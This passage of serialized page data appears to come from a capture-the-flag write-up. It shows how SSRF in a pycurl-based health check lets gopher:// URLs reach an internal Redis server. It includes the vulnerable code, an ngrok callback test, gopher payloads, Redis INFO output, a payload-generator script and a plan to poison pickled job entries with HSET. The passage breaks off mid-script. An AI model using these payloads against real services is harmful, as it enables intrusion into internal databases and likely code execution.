?",{"type":33,"tag":47,"props":43504,"children":43505},{},[43506],{"type":38,"value":43507},"The URL addition part is located in the file healthcheck.py, and here is the code:",{"type":33,"tag":114,"props":43509,"children":43510},{"lang":10227},[43511],{"type":33,"tag":119,"props":43512,"children":43514},{"code":43513,"language":10227,"meta":8,"className":10231,"style":8},"import pycurl\n\ndef request(url):\n response = False\n try:\n c = pycurl.Curl()\n c.setopt(c.URL, url)\n c.setopt(c.TIMEOUT, 5)\n c.setopt(c.VERBOSE, True)\n c.setopt(c.FOLLOWLOCATION, True)\n\n response = c.perform_rb().decode('utf-8', errors='ignore')\n c.close()\n finally:\n return response\n",[43515],{"type":33,"tag":105,"props":43516,"children":43517},{"__ignoreMap":8},[43518,43530,43537,43560,43577,43588,43618,43664,43709,43754,43798,43805,43886,43905,43917],{"type":33,"tag":128,"props":43519,"children":43520},{"class":130,"line":131},[43521,43525],{"type":33,"tag":128,"props":43522,"children":43523},{"style":1576},[43524],{"type":38,"value":10244},{"type":33,"tag":128,"props":43526,"children":43527},{"style":323},[43528],{"type":38,"value":43529}," pycurl\n",{"type":33,"tag":128,"props":43531,"children":43532},{"class":130,"line":362},[43533],{"type":33,"tag":128,"props":43534,"children":43535},{"emptyLinePlaceholder":896},[43536],{"type":38,"value":899},{"type":33,"tag":128,"props":43538,"children":43539},{"class":130,"line":403},[43540,43544,43548,43552,43556],{"type":33,"tag":128,"props":43541,"children":43542},{"style":300},[43543],{"type":38,"value":10402},{"type":33,"tag":128,"props":43545,"children":43546},{"style":135},[43547],{"type":38,"value":14050},{"type":33,"tag":128,"props":43549,"children":43550},{"style":312},[43551],{"type":38,"value":5566},{"type":33,"tag":128,"props":43553,"children":43554},{"style":323},[43555],{"type":38,"value":13952},{"type":33,"tag":128,"props":43557,"children":43558},{"style":312},[43559],{"type":38,"value":10497},{"type":33,"tag":128,"props":43561,"children":43562},{"class":130,"line":739},[43563,43568,43572],{"type":33,"tag":128,"props":43564,"children":43565},{"style":323},[43566],{"type":38,"value":43567}," response ",{"type":33,"tag":128,"props":43569,"children":43570},{"style":312},[43571],{"type":38,"value":315},{"type":33,"tag":128,"props":43573,"children":43574},{"style":1576},[43575],{"type":38,"value":43576}," False\n",{"type":33,"tag":128,"props":43578,"children":43579},{"class":130,"line":765},[43580,43584],{"type":33,"tag":128,"props":43581,"children":43582},{"style":1576},[43583],{"type":38,"value":16034},{"type":33,"tag":128,"props":43585,"children":43586},{"style":312},[43587],{"type":38,"value":5318},{"type":33,"tag":128,"props":43589,"children":43590},{"class":130,"line":804},[43591,43596,43600,43605,43609,43614],{"type":33,"tag":128,"props":43592,"children":43593},{"style":323},[43594],{"type":38,"value":43595}," c ",{"type":33,"tag":128,"props":43597,"children":43598},{"style":312},[43599],{"type":38,"value":315},{"type":33,"tag":128,"props":43601,"children":43602},{"style":323},[43603],{"type":38,"value":43604}," pycurl",{"type":33,"tag":128,"props":43606,"children":43607},{"style":312},[43608],{"type":38,"value":215},{"type":33,"tag":128,"props":43610,"children":43611},{"style":323},[43612],{"type":38,"value":43613},"Curl",{"type":33,"tag":128,"props":43615,"children":43616},{"style":312},[43617],{"type":38,"value":7857},{"type":33,"tag":128,"props":43619,"children":43620},{"class":130,"line":839},[43621,43626,43630,43635,43639,43643,43647,43652,43656,43660],{"type":33,"tag":128,"props":43622,"children":43623},{"style":323},[43624],{"type":38,"value":43625}," c",{"type":33,"tag":128,"props":43627,"children":43628},{"style":312},[43629],{"type":38,"value":215},{"type":33,"tag":128,"props":43631,"children":43632},{"style":323},[43633],{"type":38,"value":43634},"setopt",{"type":33,"tag":128,"props":43636,"children":43637},{"style":312},[43638],{"type":38,"value":5566},{"type":33,"tag":128,"props":43640,"children":43641},{"style":323},[43642],{"type":38,"value":330},{"type":33,"tag":128,"props":43644,"children":43645},{"style":312},[43646],{"type":38,"value":215},{"type":33,"tag":128,"props":43648,"children":43649},{"style":151},[43650],{"type":38,"value":43651},"URL",{"type":33,"tag":128,"props":43653,"children":43654},{"style":312},[43655],{"type":38,"value":5584},{"type":33,"tag":128,"props":43657,"children":43658},{"style":323},[43659],{"type":38,"value":15126},{"type":33,"tag":128,"props":43661,"children":43662},{"style":312},[43663],{"type":38,"value":2427},{"type":33,"tag":128,"props":43665,"children":43666},{"class":130,"line":848},[43667,43671,43675,43679,43683,43687,43691,43696,43700,43705],{"type":33,"tag":128,"props":43668,"children":43669},{"style":323},[43670],{"type":38,"value":43625},{"type":33,"tag":128,"props":43672,"children":43673},{"style":312},[43674],{"type":38,"value":215},{"type":33,"tag":128,"props":43676,"children":43677},{"style":323},[43678],{"type":38,"value":43634},{"type":33,"tag":128,"props":43680,"children":43681},{"style":312},[43682],{"type":38,"value":5566},{"type":33,"tag":128,"props":43684,"children":43685},{"style":323},[43686],{"type":38,"value":330},{"type":33,"tag":128,"props":43688,"children":43689},{"style":312},[43690],{"type":38,"value":215},{"type":33,"tag":128,"props":43692,"children":43693},{"style":151},[43694],{"type":38,"value":43695},"TIMEOUT",{"type":33,"tag":128,"props":43697,"children":43698},{"style":312},[43699],{"type":38,"value":5584},{"type":33,"tag":128,"props":43701,"children":43702},{"style":523},[43703],{"type":38,"value":43704}," 5",{"type":33,"tag":128,"props":43706,"children":43707},{"style":312},[43708],{"type":38,"value":2427},{"type":33,"tag":128,"props":43710,"children":43711},{"class":130,"line":976},[43712,43716,43720,43724,43728,43732,43736,43741,43745,43750],{"type":33,"tag":128,"props":43713,"children":43714},{"style":323},[43715],{"type":38,"value":43625},{"type":33,"tag":128,"props":43717,"children":43718},{"style":312},[43719],{"type":38,"value":215},{"type":33,"tag":128,"props":43721,"children":43722},{"style":323},[43723],{"type":38,"value":43634},{"type":33,"tag":128,"props":43725,"children":43726},{"style":312},[43727],{"type":38,"value":5566},{"type":33,"tag":128,"props":43729,"children":43730},{"style":323},[43731],{"type":38,"value":330},{"type":33,"tag":128,"props":43733,"children":43734},{"style":312},[43735],{"type":38,"value":215},{"type":33,"tag":128,"props":43737,"children":43738},{"style":151},[43739],{"type":38,"value":43740},"VERBOSE",{"type":33,"tag":128,"props":43742,"children":43743},{"style":312},[43744],{"type":38,"value":5584},{"type":33,"tag":128,"props":43746,"children":43747},{"style":1576},[43748],{"type":38,"value":43749}," True",{"type":33,"tag":128,"props":43751,"children":43752},{"style":312},[43753],{"type":38,"value":2427},{"type":33,"tag":128,"props":43755,"children":43756},{"class":130,"line":988},[43757,43761,43765,43769,43773,43777,43781,43786,43790,43794],{"type":33,"tag":128,"props":43758,"children":43759},{"style":323},[43760],{"type":38,"value":43625},{"type":33,"tag":128,"props":43762,"children":43763},{"style":312},[43764],{"type":38,"value":215},{"type":33,"tag":128,"props":43766,"children":43767},{"style":323},[43768],{"type":38,"value":43634},{"type":33,"tag":128,"props":43770,"children":43771},{"style":312},[43772],{"type":38,"value":5566},{"type":33,"tag":128,"props":43774,"children":43775},{"style":323},[43776],{"type":38,"value":330},{"type":33,"tag":128,"props":43778,"children":43779},{"style":312},[43780],{"type":38,"value":215},{"type":33,"tag":128,"props":43782,"children":43783},{"style":151},[43784],{"type":38,"value":43785},"FOLLOWLOCATION",{"type":33,"tag":128,"props":43787,"children":43788},{"style":312},[43789],{"type":38,"value":5584},{"type":33,"tag":128,"props":43791,"children":43792},{"style":1576},[43793],{"type":38,"value":43749},{"type":33,"tag":128,"props":43795,"children":43796},{"style":312},[43797],{"type":38,"value":2427},{"type":33,"tag":128,"props":43799,"children":43800},{"class":130,"line":1001},[43801],{"type":33,"tag":128,"props":43802,"children":43803},{"emptyLinePlaceholder":896},[43804],{"type":38,"value":899},{"type":33,"tag":128,"props":43806,"children":43807},{"class":130,"line":1014},[43808,43813,43817,43822,43826,43831,43836,43840,43844,43848,43852,43856,43860,43865,43869,43873,43878,43882],{"type":33,"tag":128,"props":43809,"children":43810},{"style":323},[43811],{"type":38,"value":43812}," response ",{"type":33,"tag":128,"props":43814,"children":43815},{"style":312},[43816],{"type":38,"value":315},{"type":33,"tag":128,"props":43818,"children":43819},{"style":323},[43820],{"type":38,"value":43821}," c",{"type":33,"tag":128,"props":43823,"children":43824},{"style":312},[43825],{"type":38,"value":215},{"type":33,"tag":128,"props":43827,"children":43828},{"style":323},[43829],{"type":38,"value":43830},"perform_rb",{"type":33,"tag":128,"props":43832,"children":43833},{"style":312},[43834],{"type":38,"value":43835},"().",{"type":33,"tag":128,"props":43837,"children":43838},{"style":323},[43839],{"type":38,"value":10820},{"type":33,"tag":128,"props":43841,"children":43842},{"style":312},[43843],{"type":38,"value":5566},{"type":33,"tag":128,"props":43845,"children":43846},{"style":676},[43847],{"type":38,"value":6040},{"type":33,"tag":128,"props":43849,"children":43850},{"style":140},[43851],{"type":38,"value":10833},{"type":33,"tag":128,"props":43853,"children":43854},{"style":676},[43855],{"type":38,"value":6040},{"type":33,"tag":128,"props":43857,"children":43858},{"style":312},[43859],{"type":38,"value":5584},{"type":33,"tag":128,"props":43861,"children":43862},{"style":306},[43863],{"type":38,"value":43864}," errors",{"type":33,"tag":128,"props":43866,"children":43867},{"style":312},[43868],{"type":38,"value":315},{"type":33,"tag":128,"props":43870,"children":43871},{"style":676},[43872],{"type":38,"value":6040},{"type":33,"tag":128,"props":43874,"children":43875},{"style":140},[43876],{"type":38,"value":43877},"ignore",{"type":33,"tag":128,"props":43879,"children":43880},{"style":676},[43881],{"type":38,"value":6040},{"type":33,"tag":128,"props":43883,"children":43884},{"style":312},[43885],{"type":38,"value":2427},{"type":33,"tag":128,"props":43887,"children":43888},{"class":130,"line":1026},[43889,43893,43897,43901],{"type":33,"tag":128,"props":43890,"children":43891},{"style":323},[43892],{"type":38,"value":43625},{"type":33,"tag":128,"props":43894,"children":43895},{"style":312},[43896],{"type":38,"value":215},{"type":33,"tag":128,"props":43898,"children":43899},{"style":323},[43900],{"type":38,"value":23692},{"type":33,"tag":128,"props":43902,"children":43903},{"style":312},[43904],{"type":38,"value":7857},{"type":33,"tag":128,"props":43906,"children":43907},{"class":130,"line":1038},[43908,43913],{"type":33,"tag":128,"props":43909,"children":43910},{"style":1576},[43911],{"type":38,"value":43912}," finally",{"type":33,"tag":128,"props":43914,"children":43915},{"style":312},[43916],{"type":38,"value":5318},{"type":33,"tag":128,"props":43918,"children":43919},{"class":130,"line":1051},[43920,43924],{"type":33,"tag":128,"props":43921,"children":43922},{"style":1576},[43923],{"type":38,"value":13615},{"type":33,"tag":128,"props":43925,"children":43926},{"style":323},[43927],{"type":38,"value":43928}," response\n",{"type":33,"tag":47,"props":43930,"children":43931},{},[43932,43934,43941],{"type":38,"value":43933},"We can test the URL call, with ",{"type":33,"tag":53,"props":43935,"children":43938},{"href":43936,"rel":43937},"https://github.com/owalid/express-sec/",[57],[43939],{"type":38,"value":43940},"express-sec",{"type":38,"value":43942}," and Ngrok. If we enter a URL that belongs to us, we can quickly see that the site sends us an HTTP request.",{"type":33,"tag":114,"props":43944,"children":43945},{},[43946],{"type":33,"tag":119,"props":43947,"children":43949},{"code":43948},"POST /api/tracks/add HTTP/1.1\nHost: localhost:1337\nReferer: http://localhost:1337/admin/\nContent-Type: application/json\nContent-Length: 66\nOrigin: http://localhost:1337\nConnection: close\nCookie: session=8e3c330d-3f69-475a-9924-9638f040b30e\n\n{\"trapName\":\"test\",\"trapURL\":\"http://b536-91-69-133-214.ngrok.io\"}\n",[43950],{"type":33,"tag":105,"props":43951,"children":43952},{"__ignoreMap":8},[43953],{"type":38,"value":43948},{"type":33,"tag":32400,"props":43955,"children":43957},{"width":40587,"src":43956},"https://user-images.githubusercontent.com/28403617/227356280-ac9d4799-e53e-4dea-9a6c-9998066ced0f.png",[],{"type":33,"tag":47,"props":43959,"children":43960},{},[43961,43963,43968],{"type":38,"value":43962},"If you pay attention to the payload, you will realize that we specify the protocol, in our case ",{"type":33,"tag":105,"props":43964,"children":43966},{"className":43965},[],[43967],{"type":38,"value":1561},{"type":38,"value":215},{"type":33,"tag":47,"props":43970,"children":43971},{},[43972],{"type":38,"value":43973},"We now know that the application contains a Redis service, which could be accessed via the Gopher protocol to perform requests, modify keys, retrieve keys, etc.",{"type":33,"tag":40,"props":43975,"children":43977},{"id":43976},"call-redis-with-gopher-protocol",[43978],{"type":38,"value":43979},"Call redis with gopher protocol",{"type":33,"tag":22891,"props":43981,"children":43982},{},[43983],{"type":33,"tag":47,"props":43984,"children":43985},{},[43986],{"type":38,"value":43987},"\"The Gopher protocol is an early protocol for distributing, searching, and retrieving documents over the internet. It was developed in the early 1990s at the University of Minnesota as an alternative to the World Wide Web (WWW), which was still in its early stages at the time. [...] The Gopher protocol operates by organizing information into a hierarchical structure, with directories and subdirectories that contain files, similar to a file system on a computer. This allows users to easily navigate and search for information, as well as retrieve and download files.\"",{"type":33,"tag":47,"props":43989,"children":43990},{},[43991],{"type":33,"tag":53,"props":43992,"children":43995},{"href":43993,"rel":43994},"https://en.wikipedia.org/wiki/Gopher_(protocol)",[57],[43996],{"type":38,"value":43997},"source",{"type":33,"tag":47,"props":43999,"children":44000},{},[44001],{"type":38,"value":44002},"An example of utilisation:",{"type":33,"tag":114,"props":44004,"children":44005},{},[44006],{"type":33,"tag":119,"props":44007,"children":44009},{"code":44008},"gopher://\u003CURL>:\u003CPORT>/_\u003CURL_ENCODED_COMMAND>%0A\n",[44010],{"type":33,"tag":105,"props":44011,"children":44012},{"__ignoreMap":8},[44013],{"type":38,"value":44008},{"type":33,"tag":47,"props":44015,"children":44016},{},[44017],{"type":38,"value":44018},"If we try to transmit a request to get information from the redis server, using the following redis request, we will have a proof that the python service is able to call redis.",{"type":33,"tag":47,"props":44020,"children":44021},{},[44022],{"type":38,"value":44023},"Our raw payload in redis console will be:",{"type":33,"tag":114,"props":44025,"children":44026},{},[44027],{"type":33,"tag":119,"props":44028,"children":44030},{"code":44029},"redis> INFO\nquit\n",[44031],{"type":33,"tag":105,"props":44032,"children":44033},{"__ignoreMap":8},[44034],{"type":38,"value":44029},{"type":33,"tag":47,"props":44036,"children":44037},{},[44038],{"type":38,"value":44039},"We need to encode this as url encode:",{"type":33,"tag":114,"props":44041,"children":44042},{},[44043],{"type":33,"tag":119,"props":44044,"children":44046},{"code":44045},"INFO%0D%0Aquit%0D%0A\n",[44047],{"type":33,"tag":105,"props":44048,"children":44049},{"__ignoreMap":8},[44050],{"type":38,"value":44045},{"type":33,"tag":47,"props":44052,"children":44053},{},[44054],{"type":38,"value":44055},"Our final payload to get info will be:",{"type":33,"tag":114,"props":44057,"children":44058},{},[44059],{"type":33,"tag":119,"props":44060,"children":44062},{"code":44061},"{\"trapName\":\"hello\",\"trapURL\":\"gopher://127.0.0.1:6379/_%0D%0AINFO%0D%0Aquit%0D%0A\"}\n",[44063],{"type":33,"tag":105,"props":44064,"children":44065},{"__ignoreMap":8},[44066],{"type":38,"value":44061},{"type":33,"tag":47,"props":44068,"children":44069},{},[44070],{"type":38,"value":44071},"If we place some debug prints in the return of pycurl requests in the code base, we can see that the python service is able to call redis.",{"type":33,"tag":47,"props":44073,"children":44074},{},[44075],{"type":38,"value":44076},"And we have the redis info:",{"type":33,"tag":114,"props":44078,"children":44079},{},[44080],{"type":33,"tag":119,"props":44081,"children":44083},{"code":44082},"$3290\n# Server\nredis_version:5.0.14\nredis_git_sha1:00000000\nredis_git_dirty:0\nredis_build_id:17cc4bf7c682c268\nredis_mode:standalone\nos:Linux 5.10.76-linuxkit x86_64\narch_bits:64\n.......\n# Cluster\ncluster_enabled:0\n\n# Keyspace\ndb0:keys=2,expires=0,avg_ttl=0\n\n+OK\n",[44084],{"type":33,"tag":105,"props":44085,"children":44086},{"__ignoreMap":8},[44087],{"type":38,"value":44082},{"type":33,"tag":47,"props":44089,"children":44090},{},[44091],{"type":38,"value":44092},"At this point, we know that it's possible to contact the Redis service via an SSRF vulnerability.",{"type":33,"tag":47,"props":44094,"children":44095},{},[44096,44098,44105],{"type":38,"value":44097},"Our goal now is to pollute the Redis keys. If we take a look at Redis, we can see that the Python client uses hash keys. We can see in the ",{"type":33,"tag":53,"props":44099,"children":44102},{"href":44100,"rel":44101},"https://redis.io/commands/hset/",[57],[44103],{"type":38,"value":44104},"Redis documentation",{"type":38,"value":44106}," how to interact with this type of keys.",{"type":33,"tag":32400,"props":44108,"children":44110},{"width":40587,"src":44109},"https://user-images.githubusercontent.com/28403617/227360017-52291945-f235-4643-b4e4-0b9f78fcf0f7.png",[],{"type":33,"tag":47,"props":44112,"children":44113},{},[44114],{"type":38,"value":44115},"If we take an example of a Redis query in the code, we can easily guess the values to use in our malicious query.",{"type":33,"tag":47,"props":44117,"children":44118},{},[44119],{"type":38,"value":44120},"Here is an example of a Redis query in the code:",{"type":33,"tag":114,"props":44122,"children":44123},{"lang":10227},[44124],{"type":33,"tag":119,"props":44125,"children":44127},{"code":44126,"language":10227,"meta":8,"className":10231,"style":8},"config = {\n 'REDIS_HOST' : '127.0.0.1',\n 'REDIS_PORT' : 6379,\n 'REDIS_JOBS' : 'jobs',\n 'REDIS_QUEUE' : 'jobqueue',\n 'REDIS_NUM_JOBS' : 100\n}\n# ...\nstore.hset(env('REDIS_JOBS'), job['job_id'], base64.b64encode(pickle.dumps(job)))\n",[44128],{"type":33,"tag":105,"props":44129,"children":44130},{"__ignoreMap":8},[44131,44147,44183,44212,44249,44286,44311,44318,44326],{"type":33,"tag":128,"props":44132,"children":44133},{"class":130,"line":131},[44134,44139,44143],{"type":33,"tag":128,"props":44135,"children":44136},{"style":323},[44137],{"type":38,"value":44138},"config ",{"type":33,"tag":128,"props":44140,"children":44141},{"style":312},[44142],{"type":38,"value":315},{"type":33,"tag":128,"props":44144,"children":44145},{"style":312},[44146],{"type":38,"value":762},{"type":33,"tag":128,"props":44148,"children":44149},{"class":130,"line":362},[44150,44154,44159,44163,44167,44171,44175,44179],{"type":33,"tag":128,"props":44151,"children":44152},{"style":676},[44153],{"type":38,"value":10362},{"type":33,"tag":128,"props":44155,"children":44156},{"style":140},[44157],{"type":38,"value":44158},"REDIS_HOST",{"type":33,"tag":128,"props":44160,"children":44161},{"style":676},[44162],{"type":38,"value":6040},{"type":33,"tag":128,"props":44164,"children":44165},{"style":312},[44166],{"type":38,"value":26220},{"type":33,"tag":128,"props":44168,"children":44169},{"style":676},[44170],{"type":38,"value":6739},{"type":33,"tag":128,"props":44172,"children":44173},{"style":140},[44174],{"type":38,"value":31790},{"type":33,"tag":128,"props":44176,"children":44177},{"style":676},[44178],{"type":38,"value":6040},{"type":33,"tag":128,"props":44180,"children":44181},{"style":312},[44182],{"type":38,"value":693},{"type":33,"tag":128,"props":44184,"children":44185},{"class":130,"line":403},[44186,44190,44195,44199,44203,44208],{"type":33,"tag":128,"props":44187,"children":44188},{"style":676},[44189],{"type":38,"value":10362},{"type":33,"tag":128,"props":44191,"children":44192},{"style":140},[44193],{"type":38,"value":44194},"REDIS_PORT",{"type":33,"tag":128,"props":44196,"children":44197},{"style":676},[44198],{"type":38,"value":6040},{"type":33,"tag":128,"props":44200,"children":44201},{"style":312},[44202],{"type":38,"value":26220},{"type":33,"tag":128,"props":44204,"children":44205},{"style":523},[44206],{"type":38,"value":44207}," 6379",{"type":33,"tag":128,"props":44209,"children":44210},{"style":312},[44211],{"type":38,"value":693},{"type":33,"tag":128,"props":44213,"children":44214},{"class":130,"line":739},[44215,44219,44224,44228,44232,44236,44241,44245],{"type":33,"tag":128,"props":44216,"children":44217},{"style":676},[44218],{"type":38,"value":10362},{"type":33,"tag":128,"props":44220,"children":44221},{"style":140},[44222],{"type":38,"value":44223},"REDIS_JOBS",{"type":33,"tag":128,"props":44225,"children":44226},{"style":676},[44227],{"type":38,"value":6040},{"type":33,"tag":128,"props":44229,"children":44230},{"style":312},[44231],{"type":38,"value":26220},{"type":33,"tag":128,"props":44233,"children":44234},{"style":676},[44235],{"type":38,"value":6739},{"type":33,"tag":128,"props":44237,"children":44238},{"style":140},[44239],{"type":38,"value":44240},"jobs",{"type":33,"tag":128,"props":44242,"children":44243},{"style":676},[44244],{"type":38,"value":6040},{"type":33,"tag":128,"props":44246,"children":44247},{"style":312},[44248],{"type":38,"value":693},{"type":33,"tag":128,"props":44250,"children":44251},{"class":130,"line":765},[44252,44256,44261,44265,44269,44273,44278,44282],{"type":33,"tag":128,"props":44253,"children":44254},{"style":676},[44255],{"type":38,"value":10362},{"type":33,"tag":128,"props":44257,"children":44258},{"style":140},[44259],{"type":38,"value":44260},"REDIS_QUEUE",{"type":33,"tag":128,"props":44262,"children":44263},{"style":676},[44264],{"type":38,"value":6040},{"type":33,"tag":128,"props":44266,"children":44267},{"style":312},[44268],{"type":38,"value":26220},{"type":33,"tag":128,"props":44270,"children":44271},{"style":676},[44272],{"type":38,"value":6739},{"type":33,"tag":128,"props":44274,"children":44275},{"style":140},[44276],{"type":38,"value":44277},"jobqueue",{"type":33,"tag":128,"props":44279,"children":44280},{"style":676},[44281],{"type":38,"value":6040},{"type":33,"tag":128,"props":44283,"children":44284},{"style":312},[44285],{"type":38,"value":693},{"type":33,"tag":128,"props":44287,"children":44288},{"class":130,"line":804},[44289,44293,44298,44302,44306],{"type":33,"tag":128,"props":44290,"children":44291},{"style":676},[44292],{"type":38,"value":10362},{"type":33,"tag":128,"props":44294,"children":44295},{"style":140},[44296],{"type":38,"value":44297},"REDIS_NUM_JOBS",{"type":33,"tag":128,"props":44299,"children":44300},{"style":676},[44301],{"type":38,"value":6040},{"type":33,"tag":128,"props":44303,"children":44304},{"style":312},[44305],{"type":38,"value":26220},{"type":33,"tag":128,"props":44307,"children":44308},{"style":523},[44309],{"type":38,"value":44310}," 100\n",{"type":33,"tag":128,"props":44312,"children":44313},{"class":130,"line":839},[44314],{"type":33,"tag":128,"props":44315,"children":44316},{"style":312},[44317],{"type":38,"value":854},{"type":33,"tag":128,"props":44319,"children":44320},{"class":130,"line":848},[44321],{"type":33,"tag":128,"props":44322,"children":44323},{"style":5541},[44324],{"type":38,"value":44325},"# ...\n",{"type":33,"tag":128,"props":44327,"children":44328},{"class":130,"line":976},[44329,44334,44338,44343,44347,44352,44356,44360,44364,44368,44372,44377,44381,44385,44390,44394,44398,44402,44406,44410,44414,44419,44423,44428,44432,44437],{"type":33,"tag":128,"props":44330,"children":44331},{"style":323},[44332],{"type":38,"value":44333},"store",{"type":33,"tag":128,"props":44335,"children":44336},{"style":312},[44337],{"type":38,"value":215},{"type":33,"tag":128,"props":44339,"children":44340},{"style":323},[44341],{"type":38,"value":44342},"hset",{"type":33,"tag":128,"props":44344,"children":44345},{"style":312},[44346],{"type":38,"value":5566},{"type":33,"tag":128,"props":44348,"children":44349},{"style":323},[44350],{"type":38,"value":44351},"env",{"type":33,"tag":128,"props":44353,"children":44354},{"style":312},[44355],{"type":38,"value":5566},{"type":33,"tag":128,"props":44357,"children":44358},{"style":676},[44359],{"type":38,"value":6040},{"type":33,"tag":128,"props":44361,"children":44362},{"style":140},[44363],{"type":38,"value":44223},{"type":33,"tag":128,"props":44365,"children":44366},{"style":676},[44367],{"type":38,"value":6040},{"type":33,"tag":128,"props":44369,"children":44370},{"style":312},[44371],{"type":38,"value":30055},{"type":33,"tag":128,"props":44373,"children":44374},{"style":323},[44375],{"type":38,"value":44376}," job",{"type":33,"tag":128,"props":44378,"children":44379},{"style":312},[44380],{"type":38,"value":344},{"type":33,"tag":128,"props":44382,"children":44383},{"style":676},[44384],{"type":38,"value":6040},{"type":33,"tag":128,"props":44386,"children":44387},{"style":140},[44388],{"type":38,"value":44389},"job_id",{"type":33,"tag":128,"props":44391,"children":44392},{"style":676},[44393],{"type":38,"value":6040},{"type":33,"tag":128,"props":44395,"children":44396},{"style":312},[44397],{"type":38,"value":13540},{"type":33,"tag":128,"props":44399,"children":44400},{"style":323},[44401],{"type":38,"value":10200},{"type":33,"tag":128,"props":44403,"children":44404},{"style":312},[44405],{"type":38,"value":215},{"type":33,"tag":128,"props":44407,"children":44408},{"style":323},[44409],{"type":38,"value":10792},{"type":33,"tag":128,"props":44411,"children":44412},{"style":312},[44413],{"type":38,"value":5566},{"type":33,"tag":128,"props":44415,"children":44416},{"style":323},[44417],{"type":38,"value":44418},"pickle",{"type":33,"tag":128,"props":44420,"children":44421},{"style":312},[44422],{"type":38,"value":215},{"type":33,"tag":128,"props":44424,"children":44425},{"style":323},[44426],{"type":38,"value":44427},"dumps",{"type":33,"tag":128,"props":44429,"children":44430},{"style":312},[44431],{"type":38,"value":5566},{"type":33,"tag":128,"props":44433,"children":44434},{"style":323},[44435],{"type":38,"value":44436},"job",{"type":33,"tag":128,"props":44438,"children":44439},{"style":312},[44440],{"type":38,"value":44441},")))\n",{"type":33,"tag":47,"props":44443,"children":44444},{},[44445],{"type":38,"value":44446},"From this example, we know that our Redis query will look like this:",{"type":33,"tag":114,"props":44448,"children":44449},{},[44450],{"type":33,"tag":119,"props":44451,"children":44453},{"code":44452},"HSET jobs \u003CJOB_ID> \u003CBASE64_ENCODED_JOB>\n",[44454],{"type":33,"tag":105,"props":44455,"children":44456},{"__ignoreMap":8},[44457],{"type":38,"value":44452},{"type":33,"tag":47,"props":44459,"children":44460},{},[44461],{"type":38,"value":44462},"We will use this script that allows generating payloads more easily:",{"type":33,"tag":114,"props":44464,"children":44465},{"lang":10227},[44466],{"type":33,"tag":119,"props":44467,"children":44469},{"code":44468,"language":10227,"meta":8,"className":10231,"style":8},"# create_redis_payload.py\nredis_cmd = \"\"\"\u003CPAYLOAD>\"\"\"\nformted_redis_cmd = redis_cmd.replace('\\r','').replace('\\n','%0D%0A').replace(' ','%20')\nprint(f\"gopher://127.0.0.1:6379/_{formted_redis_cmd}\")\n",[44470],{"type":33,"tag":105,"props":44471,"children":44472},{"__ignoreMap":8},[44473,44481,44508,44641],{"type":33,"tag":128,"props":44474,"children":44475},{"class":130,"line":131},[44476],{"type":33,"tag":128,"props":44477,"children":44478},{"style":5541},[44479],{"type":38,"value":44480},"# create_redis_payload.py\n",{"type":33,"tag":128,"props":44482,"children":44483},{"class":130,"line":362},[44484,44489,44493,44498,44503],{"type":33,"tag":128,"props":44485,"children":44486},{"style":323},[44487],{"type":38,"value":44488},"redis_cmd ",{"type":33,"tag":128,"props":44490,"children":44491},{"style":312},[44492],{"type":38,"value":315},{"type":33,"tag":128,"props":44494,"children":44495},{"style":676},[44496],{"type":38,"value":44497}," \"\"\"",{"type":33,"tag":128,"props":44499,"children":44500},{"style":140},[44501],{"type":38,"value":44502},"\u003CPAYLOAD>",{"type":33,"tag":128,"props":44504,"children":44505},{"style":676},[44506],{"type":38,"value":44507},"\"\"\"\n",{"type":33,"tag":128,"props":44509,"children":44510},{"class":130,"line":403},[44511,44516,44520,44525,44529,44533,44537,44541,44546,44550,44554,44559,44563,44567,44571,44575,44579,44583,44587,44591,44596,44600,44604,44608,44612,44616,44620,44624,44628,44633,44637],{"type":33,"tag":128,"props":44512,"children":44513},{"style":323},[44514],{"type":38,"value":44515},"formted_redis_cmd ",{"type":33,"tag":128,"props":44517,"children":44518},{"style":312},[44519],{"type":38,"value":315},{"type":33,"tag":128,"props":44521,"children":44522},{"style":323},[44523],{"type":38,"value":44524}," redis_cmd",{"type":33,"tag":128,"props":44526,"children":44527},{"style":312},[44528],{"type":38,"value":215},{"type":33,"tag":128,"props":44530,"children":44531},{"style":323},[44532],{"type":38,"value":16487},{"type":33,"tag":128,"props":44534,"children":44535},{"style":312},[44536],{"type":38,"value":5566},{"type":33,"tag":128,"props":44538,"children":44539},{"style":676},[44540],{"type":38,"value":6040},{"type":33,"tag":128,"props":44542,"children":44543},{"style":151},[44544],{"type":38,"value":44545},"\\r",{"type":33,"tag":128,"props":44547,"children":44548},{"style":676},[44549],{"type":38,"value":6040},{"type":33,"tag":128,"props":44551,"children":44552},{"style":312},[44553],{"type":38,"value":5584},{"type":33,"tag":128,"props":44555,"children":44556},{"style":676},[44557],{"type":38,"value":44558},"''",{"type":33,"tag":128,"props":44560,"children":44561},{"style":312},[44562],{"type":38,"value":6700},{"type":33,"tag":128,"props":44564,"children":44565},{"style":323},[44566],{"type":38,"value":16487},{"type":33,"tag":128,"props":44568,"children":44569},{"style":312},[44570],{"type":38,"value":5566},{"type":33,"tag":128,"props":44572,"children":44573},{"style":676},[44574],{"type":38,"value":6040},{"type":33,"tag":128,"props":44576,"children":44577},{"style":151},[44578],{"type":38,"value":38268},{"type":33,"tag":128,"props":44580,"children":44581},{"style":676},[44582],{"type":38,"value":6040},{"type":33,"tag":128,"props":44584,"children":44585},{"style":312},[44586],{"type":38,"value":5584},{"type":33,"tag":128,"props":44588,"children":44589},{"style":676},[44590],{"type":38,"value":6040},{"type":33,"tag":128,"props":44592,"children":44593},{"style":140},[44594],{"type":38,"value":44595},"%0D%0A",{"type":33,"tag":128,"props":44597,"children":44598},{"style":676},[44599],{"type":38,"value":6040},{"type":33,"tag":128,"props":44601,"children":44602},{"style":312},[44603],{"type":38,"value":6700},{"type":33,"tag":128,"props":44605,"children":44606},{"style":323},[44607],{"type":38,"value":16487},{"type":33,"tag":128,"props":44609,"children":44610},{"style":312},[44611],{"type":38,"value":5566},{"type":33,"tag":128,"props":44613,"children":44614},{"style":676},[44615],{"type":38,"value":6040},{"type":33,"tag":128,"props":44617,"children":44618},{"style":676},[44619],{"type":38,"value":6739},{"type":33,"tag":128,"props":44621,"children":44622},{"style":312},[44623],{"type":38,"value":5584},{"type":33,"tag":128,"props":44625,"children":44626},{"style":676},[44627],{"type":38,"value":6040},{"type":33,"tag":128,"props":44629,"children":44630},{"style":140},[44631],{"type":38,"value":44632},"%20",{"type":33,"tag":128,"props":44634,"children":44635},{"style":676},[44636],{"type":38,"value":6040},{"type":33,"tag":128,"props":44638,"children":44639},{"style":312},[44640],{"type":38,"value":2427},{"type":33,"tag":128,"props":44642,"children":44643},{"cla